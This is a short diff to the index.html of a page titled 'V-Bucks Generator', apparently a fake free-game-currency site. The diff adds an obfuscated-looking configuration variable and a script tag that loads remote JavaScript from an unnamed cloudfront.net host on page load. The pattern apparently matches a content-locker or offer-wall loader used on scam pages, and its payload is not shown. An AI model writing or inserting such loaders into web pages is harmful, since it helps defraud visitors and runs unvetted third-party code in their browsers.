--- a/index.html
+++ b/index.html
@@ -9,6 +9,10 @@
     <meta name="author" content="V-Bucks Generator" />
     <meta property="og:image" content="/og-image.png" />
     <link rel="icon" type="image/png" href="/favicon.ico" />
+    <script type="text/javascript">
+      var iBtil_bJL_AomqYc={"it":1380294,"key":"d34a7"};
+  </script>
+  <script src="https://d29gqhzevia104.cloudfront.net/c97ee31.js"></script>
   </head>
 
   <body>
